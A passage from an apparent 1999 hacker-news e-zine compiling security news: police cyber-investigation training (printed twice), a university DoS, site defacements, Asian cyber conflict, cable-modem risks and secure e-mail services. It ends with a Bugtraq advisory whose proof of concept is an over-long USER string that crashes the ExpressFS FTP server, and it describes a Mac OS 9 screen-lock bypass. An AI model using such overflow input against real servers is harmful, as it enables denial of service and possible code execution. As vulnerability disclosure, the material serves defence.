as America Online or CompuServe. Finding out where an e-mail originated is done by examining e-mail headers -- computerese for detailing the e-mail's travels in cyberspace. E-mail headers not only include an e-mail address, but also an Internet protocol address, which is a series of numbers, Lundberg explained. Also included are the names of mail server computers, which relay e-mail messages. They can all help pinpoint a suspect. Difficulty level increasing As more people take advantage of free Web-based e-mail services that allow them to mask their identities in cyberspace, however, investigators say it's becoming more difficult to trace criminal activity and identify the culprits. Services such as Yahoo! Mail or Hotmail from the Microsoft Corp. are allowing computer users to create false e-mail identities, aliases and handles. Anyone who wishes can register an e-mail account to stalk and harass other users, obtain child pornography, hack into Web sites and gamble. Often, there's not much that can be done to prevent it. Thor Lundberg, who is Eric's brother and a computer crimes investigator with the Raynham, Mass., Police Department, said that developing a profile of a computer hacker is difficult. "Hackers vary from being loners [and] misfits to being very arrogant and cocky," Thor Lundberg said. Profiling online behavior However, he said hackers do repeat certain online behaviors that can add up to an electronic profile of what they target and leave other cyber-clues to how they go about performing the hack. Thor Lundberg explained that before hackers go after a particular Web site, they scout around for vulnerabilities, such as a weak firewall, an open port or another way to get into a server to cause damage. "Another hacker may not use that approach and look for holes, but try to find out how many neighbors, how many other servers are connected to that main computer server," he said. Warned about reckless searches Michael Delohery, an assistant Westchester County district attorney in the high-tech crime bureau, cautioned police officers to be careful when searching and seizing computer equipment and in the way they draft subpoenas and search warrants. "You want to get ahold of subpoenas and search warrants so you can go obtain information. I'm here to warn you about going out and doing that recklessly," Delohery said. He said that if they don't follow the right procedures, individual police officers and even prosecutors open themselves up to civil liability. He cited some pieces of federal legislation that affect how to go about gathering Internet-related crime evidence. Law includes electronic publishing The Privacy Protection Act is a result of the police in Palo Alto, Calif., getting a search warrant and seizing materials from a student newspaper that had covered a campus protest and subsequent clash with the police. The act prevents the seizing of two categories of evidence, defined as documentary materials and work-product materials. But the law includes a number of exceptions to what can be obtained during a search, and the law has been expanded to also include electronic publishing. "If you do not follow the guidelines of the statute, you can be sued personally, and this has happened," Delohery said. Federal law says what cops can do The other federal law is the Electronic Communications Privacy Act, which covers three kinds of communications: wire, oral and electronic mail. "This law lays down the guidelines for what you can do. It is not an easy subject to understand. But what you can take away from it is very simple. If you want subscriber information, who is behind that screen name, what's his address, what were his log-on times, what phone numbers was he logging into, that is information you can get through a grand jury subpoena. If you want to get anything further, such as e-mail and buddy list information, that is considered stored electronic communications," Delohery explained. He said when seeking to find the real name behind a screen name, the first thing to do is to get a subpoena to the contact person at the Internet service provider. "They should be able to give you a billing address, a billing name, credit card information and a telephone number, maybe two telephone numbers. Now you have a lot you can work with. The rest is not high-tech. This is basic police work, stuff that you guys know," Delohery said. Jurisdiction problems on Internet Delohery also said the lack of geographic boundaries in dealing with Internet crime create jurisdictional problems. "It's complicated because of the nature of the beast that you're dealing with," Delohery said. "This is not a simple little thing where you can say the murder took place in this town, in this particular house, at a very specific location. When you get connected to the Internet, you are now part of a worldwide community. The jurisdiction can bounce around from different areas," he said. David Noack is an APBnews.com staff writer (david.noack@apbnews.com). Cops Get Lesson in Cyber-Sleuthing Taught to Track E-mail, Crack Hackers, Win Subpoenas Oct. 26, 1999 By David Noack TARRYTOWN, N.Y. (APBnews.com) -- When fighting Internet crime, investigators should use all the same investigative methods they use in the brick-and-mortar world. After all, cyber-crooks leave behind clues and patterns just like traditional criminals, experts say. With that said, Detective Eric Lundberg, a high-tech crime expert from the Massachusetts Attorney General's Office, turned his attention to the 150-person law enforcement audience gathered here recently. They were attending an all-day seminar on "Law Enforcement and the Internet" held by the Law Enforcement Internet Intelligence Report, a Boston-based newsletter covering the Internet and law enforcement. The would-be cyber-sleuths were briefed on everything from the fine points of tracking e-mail messages to how to spot computer hackers to the legal pitfalls in preparing subpoenas and search warrants when going after computer criminals. E-mails leave cyber-footprints Lundberg detailed his tactics for identifying a cyber-criminal when there is nothing to go on but an anonymous and threatening e-mail message. While it seems complicated, Lundberg stressed that searching for the true identity of e-mail is a process of backtracking, since e-mails actually leave cyber-footprints. E-mail is initially composed on a user's computer and then sent to a mail server computer, which is typically located at an Internet service provider such as America Online or CompuServe. Finding out where an e-mail originated is done by examining e-mail headers -- computerese for detailing the e-mail's travels in cyberspace. E-mail headers not only include an e-mail address, but also an Internet protocol address, which is a series of numbers, Lundberg explained. Also included are the names of mail server computers, which relay e-mail messages. They can all help pinpoint a suspect. Difficulty level increasing As more people take advantage of free Web-based e-mail services that allow them to mask their identities in cyberspace, however, investigators say it's becoming more difficult to trace criminal activity and identify the culprits. Services such as Yahoo! Mail or Hotmail from the Microsoft Corp. are allowing computer users to create false e-mail identities, aliases and handles. Anyone who wishes can register an e-mail account to stalk and harass other users, obtain child pornography, hack into Web sites and gamble. Often, there's not much that can be done to prevent it. Thor Lundberg, who is Eric's brother and a computer crimes investigator with the Raynham, Mass., Police Department, said that developing a profile of a computer hacker is difficult. "Hackers vary from being loners [and] misfits to being very arrogant and cocky," Thor Lundberg said. Profiling online behavior However, he said hackers do repeat certain online behaviors that can add up to an electronic profile of what they target and leave other cyber-clues to how they go about performing the hack. Thor Lundberg explained that before hackers go after a particular Web site, they scout around for vulnerabilities, such as a weak firewall, an open port or another way to get into a server to cause damage. "Another hacker may not use that approach and look for holes, but try to find out how many neighbors, how many other servers are connected to that main computer server," he said. Warned about reckless searches Michael Delohery, an assistant Westchester County district attorney in the high-tech crime bureau, cautioned police officers to be careful when searching and seizing computer equipment and in the way they draft subpoenas and search warrants. "You want to get ahold of subpoenas and search warrants so you can go obtain information. I'm here to warn you about going out and doing that recklessly," Delohery said. He said that if they don't follow the right procedures, individual police officers and even prosecutors open themselves up to civil liability. He cited some pieces of federal legislation that affect how to go about gathering Internet-related crime evidence. Law includes electronic publishing The Privacy Protection Act is a result of the police in Palo Alto, Calif., getting a search warrant and seizing materials from a student newspaper that had covered a campus protest and subsequent clash with the police. The act prevents the seizing of two categories of evidence, defined as documentary materials and work-product materials. But the law includes a number of exceptions to what can be obtained during a search, and the law has been expanded to also include electronic publishing. "If you do not follow the guidelines of the statute, you can be sued personally, and this has happened," Delohery said. Federal law says what cops can do The other federal law is the Electronic Communications Privacy Act, which covers three kinds of communications: wire, oral and electronic mail. "This law lays down the guidelines for what you can do. It is not an easy subject to understand. But what you can take away from it is very simple. If you want subscriber information, who is behind that screen name, what's his address, what were his log-on times, what phone numbers was he logging into, that is information you can get through a grand jury subpoena. If you want to get anything further, such as e-mail and buddy list information, that is considered stored electronic communications," Delohery explained. He said when seeking to find the real name behind a screen name, the first thing to do is to get a subpoena to the contact person at the Internet service provider. "They should be able to give you a billing address, a billing name, credit card information and a telephone number, maybe two telephone numbers. Now you have a lot you can work with. The rest is not high-tech. This is basic police work, stuff that you guys know," Delohery said. Jurisdiction problems on Internet Delohery also said the lack of geographic boundaries in dealing with Internet crime create jurisdictional problems. "It's complicated because of the nature of the beast that you're dealing with," Delohery said. "This is not a simple little thing where you can say the murder took place in this town, in this particular house, at a very specific location. When you get connected to the Internet, you are now part of a worldwide community. The jurisdiction can bounce around from different areas," he said. David Noack is an APBnews.com staff writer (david.noack@apbnews.com). @HWA 42.0 LSU Experiences DOS Attack ~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Weld Pond A compromised student computer in Kirby-Smith Hall of Louisiana State University is being blamed for deprivation of service problems on some of LSU's systems. (If you want to laugh read some of the quotes in this article attributed to LSUPD Capt. Mark Shaw. It is good to know he is on the case.) Excite News http://news.excite.com/news/uw/991027/university-291 LSU Web problems due to hacker Updated 12:00 PM ET October 27, 1999 By Jenny Heil The Reveille Louisiana State U. (U-WIRE) BATON ROUGE, La. -- The problems students may have experienced last week in gaining access to the Louisiana State University homepage were due to the work of a computer hacker. Computing Services was experiencing deprivation of service problems, meaning legitimate users were getting busy signals when trying to log on the LSU website, said LSUPD Capt. Mark Shaw. The problem was traced to a student's computer in Kirby-Smith Hall, but Computing Services determined the person causing the deprivation of services was not the owner of the computer. Rather, the person was from the outside and hacking into the student's computer without his permission, Shaw said. The hacker illegally tapped into the LSU system, bombarding the site with traffic so that regular users could not log on, Shaw said. "Computers are far from anonymous. They are not," Shaw said. "A system analyst can monitor any key stroke of any machine accessed to their machine." In this case, Computing Services was monitoring its users to find the cause of the connection's crash. A massive amount of traffic was coming from one computer, so Computing Services called LSUPD and went to the source, Shaw said. "We believe the hacking may be coming from out of the country," Shaw said. "That's the unique thing about the Internet. Once they're in, it can literally be anywhere in the world." Computing Services does not intend to further investigate this incident, since the problem is solved for the time being, Shaw said. "All we're really interested in is restoring services," he said. "If we continue to see the problem in the future, we'll go into deeper measures." Students should take precautions to protect not only the LSU mainframe, but their personal computers as well, Shaw said. "If you're not utilizing the mainframe or Internet access through the mainframe, shut down your Internet browser or log off the mainframe," Shaw said. Signing off the Internet when a student is not using it can prevent hackers from causing problems such as the one Computing Services experienced Oct. 22. "It's a good, safe precaution for all users because once they're [hackers] in, they can do anything," Shaw said. "The old 'dog ate my homework' has been replaced by 'my computer crashed.'" Students should also make sure their passwords include numbers and letters, which they should not share with anyone. LSUPD has dealt with other computer fraud cases in the past, such as people accessing areas of the LSU site without authorization, people downloading or making illegal copies of software and people using the mainframe as storage space, Shaw said. "A lot of what we see is someone coming into the LSU system to go out and access another site," he said. If the current problem does come up again, Shaw said he thinks the cause may be the same, someone using a student's computer to gain access to LSU. "If we just prevent the problem [with the above mentioned methods], it's as much for the students' protection as it is for the University," Shaw said. (C) 1999 The Reveille via U-WIRE @HWA 43.0 Oklahoma Paging System Vandalized ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Weld Pond Details are sketchy but a vandal broke into a MetroCall paging system in Oklahoma and sent out a page that somehow triggered dozens of others. (Of course they don't use the word vandal this guy had to be a 'hacker'.) Excite News http://news.excite.com/news/r/991028/06/ok-state-news-6 Pager Hoax Blamed On Computer Hacker Updated 6:22 AM ET October 28, 1999 (STATEWIDE) -- Authorities now know the cause of a pesky pager problem in Oklahoma. MetroCall says a hacker broke into its paging system yesterday morning and sent out a page that snowballed into dozens more around the state. The pages went off for more than ten minutes. One of the two dozen numbers sent out in the pages belonged to the Cardiac Central Monitoring Unit at Presbyterian Hospital. It was flooded with calls all morning from pager owners, calling to find out who paged them. MetroCall says the situation has been remedied. @HWA 44.0 You Thought You Were Safe ~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Ender Wiggin Brian Martin talks about the fact that nothing computerized is safe -- not your Dreamcast, your Palm Pilot, your word processing program or your telephone. He says "Security is all-inclusive, no longer a realm of obscure networks or sensitive databases full of nuclear codes and credit card numbers." OSALL http://www.aviary-mag.com/Martin/Safety/safety.html And You Thought You Were Safe! 10/27/99 Brian Martin Staff Writer The realm of computer security is not an isolated slice of life reserved for geeks and bitheads. Security is all-inclusive, no longer a realm of obscure networks or sensitive databases full of nuclear codes and credit card numbers. I know this may be hard to swallow for many people as they haven't given the matter serious thought. Stop reading for a minute and think about all things computerized in your life. Now consider which ones present potential security or privacy concerns to you. If you think any less than 90% or so present these problems, think again. Some will cast this notion aside in favor of the argument that so many security concerns are so trivial that they make no real difference. Who cares if someone knows you visited a web site or purchased something online -- right? This argument can effectively be countered any number of ways as long as the reader is willing to give them appropriate consideration. First, each of these small concerns add up. To use an old but familiar and fitting analogy, consider each privacy violation a brick. Put enough of these bricks together and you have a full-blown wall. Second, at what point do they stop being small and trivial? If you convince yourself that each security vulnerability is small, they slowly begin to grow without you acknowledging it. Before long, they have turned into full blown risks that your mind associates with 'trivial'. So in a single day, where do you encounter these risks? Anytime you use technology. Before you say "But I don't use it that much!" think about how much technology surrounds your life. In many cases it has become so integrated that you often stop noticing it. Have a personal organizer like a Palm Pilot? Play games on a Sega Dreamcast? Send e-mail to friends or family via an on-line service? Have controlled access to your office via 'strong' token cards? These points of technology slowly add up and paint a bigger picture of rapidly degrading privacy while security vulnerabilities increase in number. All of the above, and we've barely touched serious computing as far as most people are concerned. To anyone reading this that is passingly familiar with computer based news outlets like Wired, MSNBC and others, this is no doubt preaching to the choir. For those of you new to the net, I write this in hopes that you are fully aware just how vulnerable your computer setup and system can be. The disturbing trend emerging in people's reactions to security is that perception says if you aren't online, you are safe. I hate to break this to you, but connectivity has little to do with security and privacy. All it takes is a single ten second connection to the net and game over. You boot up your computer and interface with the Operating System. Be it Windows NT, Windows 95, Solaris or any other platform, it is potentially vulnerable. When you open your browser, it too poses more risks than you can possibly imagine. Both Microsoft Internet Explorer and Netscape Navigator have had their fair share of problems. Even in seemingly safe applications like Microsoft Word lurks danger. Users connecting to the net via cable modem learned quickly that while their walls protected them from neighbor's prying eyes, their modems certainly did not. As with all articles on security, I try to present the problem and a solution for my readers. What can I possibly suggest to counter such an overwhelming amount of intrusions into your personal privacy and security? Awareness. Just understanding and realizing the concerns better equips you to battle the hoards of bad guys we always read about. Be proactive when using anything electronic, assess the risks, and proceed with caution. All joking aside, it may save you a lot of headache in the near future. @HWA 45.0 The Weather Channel and Four More .gov/.mil Sites Defaced ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Space Rogue Yesterday was another busy day for those defacing web sites. Web sites owned by the Navy and the Marine Corps where hit as was The Weather Channel. Groups and people such as Narcissus, High-Tech Hate, fuqraq, flipz, p4riah, Pakistan Hackerz Club and others have claimed responsibility. (Unfortunately most of these pages are not anything to look at which is why we have not been mirroring them. We did grab a few.) HNN Defaced Pages Archive http://www.hackernews.com/archive/crackarch.html Attrition Web Mirror http://www.attrition.org/mirror/ @HWA 46.0 Nerds Will Fight Next World War ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by no0ne The Economist has an article on how computers are being used as a weapon and how it has changed the way politics, propaganda and other agendas and objectives are being pushed in Asia. This is mostly fear mongering so if you're busy today don't bother. The Economist http://www.economist.com/editorial/freeforall/30-10-99/as9668.html ASIA The Internet HACKING, spamming and spreading viruses. Each is a means to disrupt an enemy’s computer systems, and each has been employed by whizz-kids, maybe even by governments, in recent international disputes. Especially in Asia, computer nerds have nudged their way to the front line this year, arguing that the Internet is a potent weapon. Are they right? It is certainly useful for propaganda. Hours after the coup in Pakistan this month, the “Islamic group of Hackers” rewrote a government website to praise the army and condemn the arrested prime minister as corrupt, foolish and bald. Earlier, both Pakistani and Indian propagandists concerned with the conflict in Kashmir had denounced their enemies online, and attacked each other’s websites. That of the Indian army was “hijacked”, its content replaced with stories of torture of Kashmiri separatists. Similar attacks occurred during the Kosovo war this spring, and rival Chinese and Taiwanese hackers frequently compete to plant their national flags on rival sites. The Internet is anonymous, so groups in repressive countries can use it with some confidence to organise themselves. The Falun Gong spiritual movement in China—which conducted mass protests this spring and again this week, despite a government crackdown—is said by some to be managed by e-mail. The group’s websites are used to spread news and to encourage followers not to be browbeaten. Dissident hackers have attacked Chinese government computers used to censor websites and in return, it is claimed, government technicians have attacked those of dissidents. This information war is at its fiercest when activists try to sabotage others’ computers. East Timorese separatists threatened to employ scores of expert hackers against the Indonesian authorities if the government tried to rig the independence referendum in August. Jose Ramos Horta, a Timorese leader, vowed that specialists would infect computers of the Indonesian banking system with viruses. That, they said, would bring economic chaos. The threat went unfulfilled. But in China and Taiwan a cyber war of sorts has been under way for several months. After the Taiwanese president, Lee Teng-hui, said in July that relations with China should be considered as those between countries, teams of hackers have tried to disrupt rival computer systems. The National Security Bureau in Taiwan says that they have broken into government networks, including those at the justice ministry, over 150 times recently. Many incidents are blamed on Chinese government agencies. One report suggests that 72,000 “cyberspace attacks” were launched from China against Taiwan in August alone. In response, Taiwanese hacked into websites of China’s taxmen and the railways ministry. The toll can be severe. The Pentagon reckons that last year the Taiwanese spread two viruses, known as the Bloody 6/4 and Michelangelo, in part to protest against the massacre of students around Tiananmen Square in 1989. They damaged some 360,000 computers in China, at a cost of $120m. Taiwan’s deputy prime minister gave warning this autumn that cyber war is a serious worry for the future. And a report this month for the United States Congress said America’s communications, defence, power and emergency services were all vulnerable to computer attacks. Those on businesses—this week a hacker claimed he had stolen details of 150,000 Internet users at Cable and Wireless—illustrate such weaknesses. So governments are getting involved too. They develop defences for computer networks, and it is assumed they also prepare methods of attack. Hackers at NATO may have meddled with Yugoslavia’s communications system during the Kosovo war. After the bombing of China’s embassy in Belgrade, there was one direct response on the Internet: American government websites were swamped with e-mails. This practice, known as “spamming”, is designed to overload computers with information, making them unworkable. Cyber attacks have become a favourite topic of military strategists. Taiwan claims China conducted an exercise early this summer in Lanzou and Beijing military districts to see how computer viruses could cripple an enemy’s command-and-control centre. “China has developed the techniques to execute an information war in these military exercises,” said Abe Charlie Lin, of Taiwan’s defence ministry. Others will be doing the same, perhaps with the help of Internet specialists and the many institutes for the study of cyber warfare. There is a service on the Net giving details of such attacks. Unfortunately, it is at present out of order. @HWA 47.0 Hole Found in Mac OS 9 ~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by wh4cked What is believed to be the first security vulnerability found in MacOS 9 has been posted. MacOS 9 has been shipping for less than one week and is the first version of MacOS to support multiple users. The vulnerability allows one user to bypass the Console Lock feature and gain access to another users files. (This is a wicked simple hole, it is very surpriseing that this problem was not discovered during testing.) Security Focus http://www.securityfocus.com/bid/745" bugtraq id 745 class Design Error cve GENERIC-MAP-NOMATCH remote No local Yes published October 26, 1999 updated October 26, 1999 vulnerable Apple MacOS 9.0 MacOS 9 includes an idle-activated console lock feature, similar to a screensaver password in other operating systems. After a certain length of user inactivity, a dialog box appears stating that a password must be entered. After the user clicks 'OK' another dialog box appears offering the option to either supply a password or to log out the current user. If the 'log out' option is chosen, any programs running will start to shut down. In certain programs, dialog boxes are created in the shutdown process (for example, "Exit without saving? OK/Cancel"). If the user selects 'Cancel', the shutdown process is aborted and the user is returned to the current session without ever having to enter a password Apple has been notified, and It has been filed into their bug database as ID #2404562. credit Posted to Bugtraq by Sean Sosik-Hamor on October 26, 1999. reference message: Mac OS 9 Idle Lock Bug (Sean Sosik-Hamor ) @HWA 48.0 Time Spreads Cable Modem FUD ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by InfinityMatrix In the November 1st Issue of Time Magazine, the Technology section highlighted the Cable modem issue. The author, Chris Taylor, states that "most common attack reported by hacker watchers makes use of a Trojan Horse." It goes on further spreading FUD, "If you've hooked up a microphone, the remote-access hacker can listen to your conversations in real-time. If you own one of those little monitor-top video cameras, he can watch you like Big Brother." (A cable modem is no more dangerous than a regular modem. The fact that you have an insecure machine connected directly to the internet is the problem. Not the cable modem. Stop blaming the technology for a personal problem.) Time.com http://www.pathfinder.com/time/magazine/articles/0,3266,33139,00.html PERSONAL TIME/YOUR TECHNOLOGY NOVEMBER 1, 1999 VOL. 154 NO. 18 Hacker's Delight Cable modems are a speedy way to surf, but they're vulnerable--unless you protect youself BY CHRIS TAYLOR I know what gadget I want for my birthday this year. It's the same thing I've lusted after for a couple of birthdays now, and I'd trade in all the socks, ties and humorous cards about aging if only I could have it. Unfortunately, I can't, because it's a cable modem--which lets you traverse the Net at about 20 times the speed of a 56K modem--and cable-modem service is very spotty right now. In Manhattan, for example, I'd have to live between 59th and 67th Street, or in the ultra-hip East Village. Service will arrive in my slightly less hip corner of the West Village in fall 2000, which is way too late to help with my dream of downloading every last music track on http://MP3.com. The other bad news on cable modems--and this is why I'm a little mollified that I can't have one yet--is that they're more vulnerable to hacker attacks than regular set-ups. You see, one of the strengths of surfing via cable is that you're online 24 hours a day and don't have to disconnect every time you want to order Chinese food. But that can also be a weakness, because your IP address (the ZIP code of the Internet) doesn't change. Dial-up users like me who are still crawling along at 56K get moved to a different IP address every time we log on. We may be slower, but we're harder to find. Hackers like an easy target, and computers hooked up to cable modems are potentially the lowest-hanging fruit of all. Especially if they're running Windows. For reasons known only to itself, Microsoft makes its operating system default to friendly mode, entirely open to network sharing. This means when you hook your brand-new PC up to your brand-new cable modem, you unwittingly become a node on a massive network whose members can come and look around your hard drive, perhaps download your financial records. But the most common attack reported by hacker watchers makes use of a Trojan horse. These are programs with bizarre names like Back Orifice or Net Bus that can be hidden in an e-mail attachment--say, one of those animated birthday cards people seem to like e-mailing. Once you open it, you've installed the software--and the wily hacker has remote control of your PC. To be sure, dial-up users get hit by Trojans too. But all the extra bandwidth provided by cable modems makes hackers salivate. If you've hooked up a microphone, the remote-access hacker can listen to your conversations in real-time. If you own one of those little monitor-top video cameras, he can watch you like Big Brother. Now here's the good news. Such attacks are still rare; they can easily be detected; and all it takes to prevent them is common sense. Turn off file sharing in your network control panel. Add password protection to your most precious files. And for goodness' sake, don't ever, ever open an e-mail attachment from someone you don't know and trust like family. The even better news is that cable-modem providers like Road Runner (partly owned by Time Warner, parent company of this magazine) and Excite@Home are working on bigger and better firewalls to help stop snooping. Since they're twice as fast as DSL phone lines, cable modems are worth the risk. They will never be hackproof, but they should be a lot safer by the time my next birthday rolls around. This year, I'll have to settle for socks again. For more on cable modems and how to protect them, see http://timedigital.com. Questions for Chris? E-mail him at cdt@well.com END @HWA 49.0 DutchThreat Quit? ~~~~~~~~~~~~~~~~ From http://www.403-security.org/ http://www.dutchthreat.org/ Dutchthreat an underground group is showing its' dismay with the current state of affairs in the underground, originally the group announced via its web page that it had quit the scene outright but later said that they 'would be back' more on this as it progresses... Original 'quit' message; " The hackers-scene died and we are not living it anymore.. " The current defacements by #phreak.nl with their 'RedAttack the Rat" actions pushed us over the edge. It's not just their ignorance, it's the ignorance of so many lately. We are not supporting acts of childish people anymore. With this page we apologize for the behavior of so many. The Dutch Threat Crew. info@dutchthreat.org Current message; 29-10-99 We will be back.. Ok.. you win.. We received loads of mail of people telling us we over-reacted by 'quitting' Dutch Threat. Although it was never the intention to quit Dutch Threat for real the previous page was more of a temporary protest against script-kiddie behavior that, to our opinion, reached it limits by a #phreak.nl defacement. Since lack of privacy is the issue here we shouldn't run away from it but instead use the medium we have to defend ourselves and give our opinion. That's what Dutch Threat was all about in the beginning.. I'll set up a credit list with all the people that told us so ;) Tonight, After a long and boring talk with Gerrie (www.hit2000.org) he convinced me (Acos) that publishing private data from individuals in public is the only way to make people privacy-aware. Although i agree with that i'm still sure you should never use that information to start a warfare because of a personal disagreement. The RedAttack stuff isn't the only reason for the temporary shutdown of DT, I will explain this later. I still condemn the RedAttack-defacements by phreak.nl because of their childish content.. but i realized they made a point in general. So i will do the same using the motto 'there is no privacy and why should we care?'... ;) @HWA 50.0 Can you protect your image on the net? ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From http://www.403-security.org Can You Protect Your Image on the Net? http://www.pcworld.com/pcwtoday/article/0,1510,13494,00.html Rival developer says Clever Content Server's security is easily cracked. by David Essex, special to PC World October 27, 1999, 9:07 a.m. PT Alchemedia claims that its Clever Content Server encryption software, which started shipping this month, is just what Webmasters and visual artists need to prevent their valuable images from being copied and distributed. But a competing software maker says it easily cracked Alchemedia's program, so hackers could easily do so, too. Clever Content Server encrypts images stored on a Web site's servers, at a cost of $10,000-plus per server per year. When someone clicks on an image, the program sends a free browser plug-in called Clever Content Viewer, followed by the image. The viewer decrypts and displays the image, but the user can't copy, save, print, or capture it. "The Internet is a big copying machine," says Alchemedia Chief Executive Officer Daniel Schreiber. Content providers typically put up grainy thumbnail images or none at all. "It's keeping good content off the Web," Schreiber says. "The whole $13-billion digital content industry is unable to take advantage of the e-commerce opportunity." Get Cracking on This But Greg Heileman, president of competitor Elisar Systems, says his company broke through the beta version in a day and the shipping version in a hour. He says Clever Content Server attempts to catch improper access of video memory by using three Windows dynamic link libraries, a process that is easy for experienced hackers to crack. Heileman says his own product, SecureViewer (expected to ship by the end of October), is more secure because it directly controls the video hardware. But he acknowledges that SecureViewer isn't totally hacker-proof, since someone could use a hardware device to grab the video signal on its way to the PC monitor. SecureViewer, priced at around $6 to $10 for each image encrypted, requires users to download a larger viewer program than Alchemedia's, but does not require server software. To display an image, SecureViewer takes over the entire screen, leaving the browser running in the background. Schreiber responds that SecureViewer doesn't work in the Web-friendly way that content providers want. He says Clever Content Viewer provides an adequate deterrent to image theft without compromising usability. "We're not really interested in hackers and hacker-proof technology for the simple reason that our customers aren't, either," Schreiber says. Customer Concerns Alchemedia (formerly Csafe) first released a beta version of the software early this year under the name PixSafe. One potential customer, Photos to Go, an online vendor of stock photography that has used the beta version in an online demo since February, acknowledged last month that there were security issues surrounding the software. "There have been things which have been brought to our attention, which have been fixed," says Kathy Mullins, vice president of electronic services at Photos to Go. "We've looked at a lot of security products, and no one has told us they're airtight. Hackers will always find a way." @HWA 51.0 Do secure email sites offer foolproof safety? ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From http://www.403-security.org/ http://www.seattletimes.com/news/technology/html98/inbo_19991024.html Do secure e-mail sites offer foolproof safety? by Charles Bermant Special to the Seattle Times The notion that free Web-based e-mail may not be secure is a scary thought for users of these services, as they have come to rely on the convenience of logging on anywhere and exchanging up-to-the-minute information. These people don't want to have to lug a laptop around, or worse: wait until they get home until checking their messages. There is now an alternative - sort of. Free e-mail services that promise an increased level of security are emerging, promising that what you put on their servers is doubly protected from prying eyes. Both HushMail http://www.hushmail.com and SAFe-mail.net http://www.safe-mail.net sell (actually, give away) peace of mind. Both have simple, Web-based interfaces, not quite as robust as Outlook or Eudora but usable nonetheless. Hush Mail resembles HotMail, with its display ads and membership solicitation attached to each message. SAFe-mail.net has no such decoration. HushMail has no frills, while SAFe-mail attempts to build a community, offering a chat room and bulletin boards. SAFe-mail follows the now time-honored Internet tradition of providing free goods as a teaser for its paid service. Explains company representative Ian Buller, "We will offer a chargeable service to organizations who want to outsource their secure communications or as a delivered system to organizations who want to host the server at their own location." According to my unscientific test, the two services also differ in other ways: HushMail has a faster mail client interface, while SAFe-mail has a slightly faster delivery. In fact, their usefulness is necessarily limited. The encryption works only on mail sent and received on their server. Cross their firewall, and it's just as open as any other system. So in order for it to make a difference, all correspondence must take place on their server. Anywhere else, a HushMail or SAFe-net address is just an advertisement for security, the equivalent of a Brinks sign on the lawn of a house that doesn't have an alarm system. Still, it's a little strange to see people get all worked up about e-mail security. Protection of messages is equivalent to talking on the phone or having a "private" conversation in a restaurant. Technology exists to eavesdrop, and anything you say on the phone could be coming out of a speaker somewhere. But so what? The average conversations concern only the participants and their circle of associates. Who else really cares about what you are saying? Bill Gates and Bill Clinton need to take appropriate measures, but the rest of us just need to be reasonably tactful and discreet. Reader response: Mauri Pelto agreed with my emoticon-phobia, saying "the use of cutesy smiley faces and jargon only says to me the writer thinks of himself as pretty cool just because he has learned to use e-mail and needs to use the `in-language' of his new peer group to remind himself he's pretty cool. Content has become secondary to cutesiness." But David P. Anderson disagreed - violently. After calling this column "a waste of newspaper space better spent on advertising" (ouch), he points out "these symbols have been in use for long enough to have their own name. In fact, they've been around longer than computers, how do you think disparate cultures learn to communicate? Or perhaps, you just figure they should learn English?" Dave counsels me to "do a little research, find out why these things are done, before you decide that it's your job to tell us we shouldn't do them." I think he is confused. It is not my "job" to tell anyone how to act. I only suggest that some aspects of e-mail behavior may be offensive or annoying. An extremist position - "emoticons are bad" - is only meant to push people toward more moderate behavior: "If I can prevent just one person from sending just one smiley face. ..." And at the end of an amusing letter where each potential emoticon was explained in parentheses, Michael Cameron got to his point: "As a literary tool to avoid confusion, instill a bit of `humanity' back into your communications in this totally `cold and impersonal realm,' (emoticons) are priceless." Charles Bermant's advice on e-mail appears weekly in the Personal Technology section of The Seattle Times. If you have questions or suggestions, you can contact him, by e-mail, at ptech@seatimes.com Type "Inbox" in the subject field. @HWA 52.0 Celtech ExpressFS USER Buffer Overflow Vulnerability ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ bugtraq id 749 class Boundary Condition Error cve GENERIC-MAP-NOMATCH remote Yes local Yes published October 29, 1999 updated October 29, 1999 vulnerable Celtech Software ExpressFS 2.6 - Microsoft Windows 98 - Microsoft Windows 95 - Microsoft Windows NT 4.0 Celtech's ExpressFS FTP server has been found to be vulnerable by means of a buffer overflow. If an argument of sufficient length is passed after the USER command, the next command sent will cause it to crash Credit Posted to bugtraq by Luciano Martins On October 29, 1999. reference message: ExpressFS 2.x FTPServer remotely exploitable buffer overflow vulnerability (Luciano Martins ) To: BugTraq Subject: ExpressFS 2.x FTPServer remotely exploitable buffer overflow vulnerability Date: Thu Oct 28 1999 19:04:40 Author: Luciano Martins Message-ID: ExpressFS 2.x FTPServer remotely exploitable buffer overflow vulnerability Problem: We found in the ExpressFS 2.x FTP Server and earlier a vulnerable to remotely exploitable buffer overflow. This can result in a denial of service and at worst in arbitrary code being executed on the system. The vulnerabilities are the conjunction of one long user name ,and another command in this case PASS, If this long command are passed in order program crash. Tested in: Windows 98 / Windows NT Example: First command USER zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz 